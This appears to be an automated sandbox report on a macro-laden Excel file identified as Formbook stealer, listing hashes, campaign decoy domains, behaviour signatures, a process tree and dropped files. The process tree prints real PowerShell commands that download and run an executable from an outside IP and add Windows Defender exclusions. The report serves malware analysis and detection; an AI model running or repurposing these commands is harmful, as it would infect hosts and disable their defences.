Overview

overview

10

Static

static

8

SOA_PO#882...9.xlsm

windows7-x64

10

SOA_PO#882...9.xlsm

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-09-2024 08:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SOA_PO#8829921199.xlsm

  • Size

    165KB

  • MD5

    c0a096ce5928bce34fffd5874093f235

  • SHA1

    971a8fbd841e42dcab84288205525b89301825c2

  • SHA256

    54929de588e37191bfc6dd0bf4f3edc1fca58c67af0e6bc7b1bd15a66d8c1bf0

  • SHA512

    9d7c5aaf2fe546422ff3379169909929ec50f6eebba27d527178066c943ea2973a72c7501202b9502c8ccd646dfe6b49c1194c34b8f9822404bf1fad6971eb61

  • SSDEEP

    3072:BJNjJehd8PiRjkctohQQRBK0BvyixmZ49ke+jJLNkYa6+Rc64d:BJN06iactuRbB6M9+1GYaza64d

Score
10/10
formbookt20udiscoveryexecutionratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

t20u

Decoy

ecurity-jobs-ne-00989.bond

ameuniverse.shop

sychologist-therapy-33393.bond

refabricated-homes-33099.bond

urltheswirl.live

reengroce.online

cknowledgewizardinter14.sbs

excasino.club

931.bet

ilehog.net

olorandbrush.net

jpbbmr.biz

vtwenty20pt.top

nline-advertising-76521.bond

eavenresidence.net

arodyna.shop

orsi-di-massaggio.bond

est-kids-toys-near-me.today

47-nurse-76671.bond

u-suppr.top

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Process spawned unexpected child process 5 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Formbook payload 3 IoCs
    rat
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious behavior: MapViewOfSection 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3488
    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SOA_PO#8829921199.xlsm"
      2⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:840
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:1340
      • C:\Windows\SysWOW64\control.exe
        "C:\Windows\SysWOW64\control.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3284
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\Users\Public\gvpttllrilhpexthxdz.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3156
      • C:\Windows\SysWOW64\wscript.exe
        "C:\Windows\SysWOW64\wscript.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3980
      • C:\Windows\SysWOW64\wlanext.exe
        "C:\Windows\SysWOW64\wlanext.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3704
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
      1⤵
        PID:1616
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"
        1⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4312
        • C:\Users\Public\gvpttllrilhpexthxdz.exe
          "C:\Users\Public\gvpttllrilhpexthxdz.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3328
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\gvpttllrilhpexthxdz.exe"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2188
          • C:\Users\Public\gvpttllrilhpexthxdz.exe
            "C:\Users\Public\gvpttllrilhpexthxdz.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:5044
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"
        1⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2708
        • C:\Users\Public\gvpttllrilhpexthxdz.exe
          "C:\Users\Public\gvpttllrilhpexthxdz.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4864
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\gvpttllrilhpexthxdz.exe"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:912
          • C:\Users\Public\gvpttllrilhpexthxdz.exe
            "C:\Users\Public\gvpttllrilhpexthxdz.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:3696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"
        1⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4564
        • C:\Users\Public\gvpttllrilhpexthxdz.exe
          "C:\Users\Public\gvpttllrilhpexthxdz.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4556
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\gvpttllrilhpexthxdz.exe"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1852
          • C:\Users\Public\gvpttllrilhpexthxdz.exe
            "C:\Users\Public\gvpttllrilhpexthxdz.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:4168
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"
        1⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2892
        • C:\Users\Public\gvpttllrilhpexthxdz.exe
          "C:\Users\Public\gvpttllrilhpexthxdz.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3056
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"
        1⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3244
        • C:\Users\Public\gvpttllrilhpexthxdz.exe
          "C:\Users\Public\gvpttllrilhpexthxdz.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1464

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        556084f2c6d459c116a69d6fedcc4105

        SHA1

        633e89b9a1e77942d822d14de6708430a3944dbc

        SHA256

        88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

        SHA512

        0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gvpttllrilhpexthxdz.exe.log
        Filesize

        1KB

        MD5

        8ec831f3e3a3f77e4a7b9cd32b48384c

        SHA1

        d83f09fd87c5bd86e045873c231c14836e76a05c

        SHA256

        7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

        SHA512

        26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        968cb9309758126772781b83adb8a28f

        SHA1

        8da30e71accf186b2ba11da1797cf67f8f78b47c

        SHA256

        92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

        SHA512

        4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        d885ff0a315aff2824ba7bf4cbc482a5

        SHA1

        bc3a1551c5d5a884218efcd927192b53d6bf926d

        SHA256

        d09042154696756eb7337d32b752b3c8613f05a1691cc721594b6eb3dae66121

        SHA512

        91cc40bc645d332134547077d3f22dacb6958e830d2cc5127d4d258a0f7c80ed096f46dfe4cb1ec06a2c5f77112c494d620ff94ac085e6fe34f18f78be15c902

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        18KB

        MD5

        d70045f69f3e495d73e07c2d3304934d

        SHA1

        71b0acbe5991a8297d1823471622e138afec00d6

        SHA256

        eb53c1fdb2e99061a4ec5bca4b1cffd3599679139a804f302e80695722ec8524

        SHA512

        6652eea2320e6d1dc51cca5a9f6a21b549f268478e1aa1e91c696846b7ad3e70c6463a203a62f7336dda5dbf62737f19d519f9d08cd7396d4237415dcbeef675

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        fbbe616c6563865d0f776ed058aec2c4

        SHA1

        68a910fa8fad4b21e8cdc0c0263dbef6cadcc268

        SHA256

        dd1a56d9f57e412134fb8601e43727e06edde336dba81888c6f79828e6c5c0d7

        SHA512

        6422316dddc9efccb04d1b84f38014e4d565d228f6d7e0e799154ccec8dde7c795270cbb1d37e4a5630f3b61b326cb72771e76ad7dcde0d3e6bfcbe9d8802969

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        18KB

        MD5

        c86a3652954cb67c7334341f0374a873

        SHA1

        2e4be216ce92ecc23419f6ffc8a47998deaa0b67

        SHA256

        9e6802d9ca2ab699ad6813cd366ba2a5493f2a5a90a1b3b5e1cb24e5988817e3

        SHA512

        9c9446d280f9491d5dfbf560460e735b8de6021ab4b2f2632457404c5f412b2003d25bf74195f4942904102036c5b13958e4cb6b32d88fe7123ada16dca2fc87

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        18KB

        MD5

        9f3d3c7a642909e3ba01fdeb3b52bf0a

        SHA1

        7628cfb36c8555dc5080cc7facb6b5c83a6661c2

        SHA256

        b89a466b6d4ba7aad297f29dfa0e03f193e6ed4211842e7adbee1e896f810cc7

        SHA512

        6e9138160715d32cf236a11bea4bf882299344e6bdf9fe01ef13d7080cbbd1283fc890cf63acf1cdaaae370d042950dcf4bc9dabbea65d0d336e8a789ea8e2a9

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        8d80c45e0e047b75073a3d1c2710c68f

        SHA1

        babc73cf30327b36d184239a2747ec94d48929f4

        SHA256

        6859c4cad4b17bf02f7f25d9b5b9633491a29c1420ccbdf9342a459d5be05e64

        SHA512

        5da876ce855d1d9a031899d283bf2ac6c53c4d14982a1300e4d128cbde46202a259d1299dfb40c81fcfe5fb6770fb00f404673c13967800392f8f8442a5d2d24

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3xkcqrr1.pfp.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
        Filesize

        1KB

        MD5

        3d811ee933c0e9b8b1c0bb02ec7f79ee

        SHA1

        41a6536051315f3b2445e9b273cb722effea61a7

        SHA256

        c45151d825c137a8e3c13cd25c73998780a3c3a6a683b7efab48e12574c5b880

        SHA512

        5288ce522cbe2c12bc38494b569e6d777d116a785b60cf4d466a7009de152baeeec45f5aa2e8f9cbd48b71ce1984cf56f39df2d22caa2b203dbbbb78a65a9c0b

        Download Submit

      • C:\Users\Public\gvpttllrilhpexthxdz.exe
        Filesize

        607KB

        MD5

        0854c389689bb92cf7463197df6dd98e

        SHA1

        d636129847d4c92a8b6aa15ab7a75ee857c7c9b8

        SHA256

        2779dab5ffc62d1641b00c1093798d2a56ad348168f4d973c2d92ececf0df400

        SHA512

        2a96a18dfa551a551ce4ac4cbefe0c4a4522284d43ae285218157042d99e294441126eb9bcaa6edd6f6875930237a77ac2a8a0fa6370f1e90a8aa701235fe322

        Download Submit

      • memory/840-3-0x00007FFD8CD70000-0x00007FFD8CD80000-memory.dmp

        Filesize

        64KB

        Download

      • memory/840-14-0x00007FFD8A4A0000-0x00007FFD8A4B0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/840-10-0x00007FFDCCCF0000-0x00007FFDCCEE5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/840-5-0x00007FFDCCCF0000-0x00007FFDCCEE5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/840-25-0x00007FFDCCCF0000-0x00007FFDCCEE5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/840-26-0x00007FFDCCD8D000-0x00007FFDCCD8E000-memory.dmp

        Filesize

        4KB

        Download

      • memory/840-27-0x00007FFDCCCF0000-0x00007FFDCCEE5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/840-0-0x00007FFD8CD70000-0x00007FFD8CD80000-memory.dmp

        Filesize

        64KB

        Download

      • memory/840-11-0x00007FFDCCCF0000-0x00007FFDCCEE5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/840-1-0x00007FFDCCD8D000-0x00007FFDCCD8E000-memory.dmp

        Filesize

        4KB

        Download

      • memory/840-15-0x00007FFD8A4A0000-0x00007FFD8A4B0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/840-8-0x00007FFDCCCF0000-0x00007FFDCCEE5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/840-7-0x00007FFD8CD70000-0x00007FFD8CD80000-memory.dmp

        Filesize

        64KB

        Download

      • memory/840-9-0x00007FFDCCCF0000-0x00007FFDCCEE5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/840-4-0x00007FFD8CD70000-0x00007FFD8CD80000-memory.dmp

        Filesize

        64KB

        Download

      • memory/840-6-0x00007FFDCCCF0000-0x00007FFDCCEE5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/840-12-0x00007FFDCCCF0000-0x00007FFDCCEE5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/840-13-0x00007FFDCCCF0000-0x00007FFDCCEE5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/840-2-0x00007FFD8CD70000-0x00007FFD8CD80000-memory.dmp

        Filesize

        64KB

        Download

      • memory/912-165-0x000000006FA70000-0x000000006FABC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/912-164-0x0000000005B10000-0x0000000005B5C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/912-177-0x0000000007000000-0x0000000007014000-memory.dmp

        Filesize

        80KB

        Download

      • memory/912-158-0x00000000052C0000-0x0000000005614000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/912-175-0x0000000006CB0000-0x0000000006D53000-memory.dmp

        Filesize

        652KB

        Download

      • memory/912-176-0x0000000006FC0000-0x0000000006FD1000-memory.dmp

        Filesize

        68KB

        Download

      • memory/1852-209-0x000000006FA70000-0x000000006FABC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/1852-207-0x00000000057C0000-0x0000000005B14000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/2188-110-0x000000006FEE0000-0x000000006FF2C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/2188-94-0x00000000057B0000-0x0000000005816000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2188-108-0x0000000005F80000-0x0000000005FCC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/2188-109-0x0000000006F10000-0x0000000006F42000-memory.dmp

        Filesize

        200KB

        Download

      • memory/2188-105-0x0000000005940000-0x0000000005C94000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/2188-120-0x0000000006520000-0x000000000653E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2188-121-0x0000000006F50000-0x0000000006FF3000-memory.dmp

        Filesize

        652KB

        Download

      • memory/2188-122-0x00000000078B0000-0x0000000007F2A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/2188-123-0x0000000007270000-0x000000000728A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2188-124-0x00000000072E0000-0x00000000072EA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2188-125-0x00000000074F0000-0x0000000007586000-memory.dmp

        Filesize

        600KB

        Download

      • memory/2188-126-0x0000000007470000-0x0000000007481000-memory.dmp

        Filesize

        68KB

        Download

      • memory/2188-127-0x00000000074A0000-0x00000000074AE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/2188-128-0x00000000074B0000-0x00000000074C4000-memory.dmp

        Filesize

        80KB

        Download

      • memory/2188-129-0x00000000075B0000-0x00000000075CA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2188-130-0x0000000007590000-0x0000000007598000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2188-90-0x0000000002660000-0x0000000002696000-memory.dmp

        Filesize

        216KB

        Download

      • memory/2188-91-0x0000000005180000-0x00000000057A8000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/2188-95-0x00000000058D0000-0x0000000005936000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2188-107-0x0000000005F40000-0x0000000005F5E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2188-93-0x0000000005080000-0x00000000050A2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3284-134-0x00000000002D0000-0x00000000002FF000-memory.dmp

        Filesize

        188KB

        Download

      • memory/3284-131-0x00000000003F0000-0x0000000000417000-memory.dmp

        Filesize

        156KB

        Download

      • memory/3328-69-0x0000000004C50000-0x0000000004CE2000-memory.dmp

        Filesize

        584KB

        Download

      • memory/3328-68-0x0000000005200000-0x00000000057A4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/3328-85-0x0000000005EB0000-0x0000000005F26000-memory.dmp

        Filesize

        472KB

        Download

      • memory/3328-71-0x0000000005060000-0x0000000005078000-memory.dmp

        Filesize

        96KB

        Download

      • memory/3328-70-0x0000000004DE0000-0x0000000004DEA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3328-67-0x00000000001E0000-0x000000000027E000-memory.dmp

        Filesize

        632KB

        Download

      • memory/3328-86-0x0000000008670000-0x000000000870C000-memory.dmp

        Filesize

        624KB

        Download

      • memory/3488-220-0x0000000009080000-0x00000000091B1000-memory.dmp

        Filesize

        1.2MB

        Download

      • memory/3488-222-0x0000000009080000-0x00000000091B1000-memory.dmp

        Filesize

        1.2MB

        Download

      • memory/3704-224-0x00000000003E0000-0x00000000003F7000-memory.dmp

        Filesize

        92KB

        Download

      • memory/3704-230-0x00000000003E0000-0x00000000003F7000-memory.dmp

        Filesize

        92KB

        Download

      • memory/3980-179-0x0000000000290000-0x00000000002B7000-memory.dmp

        Filesize

        156KB

        Download

      • memory/4168-221-0x0000000000400000-0x000000000042F000-memory.dmp

        Filesize

        188KB

        Download

      • memory/4312-53-0x0000023164220000-0x0000023164242000-memory.dmp

        Filesize

        136KB

        Download

      • memory/5044-87-0x0000000000400000-0x000000000042F000-memory.dmp

        Filesize

        188KB

        Download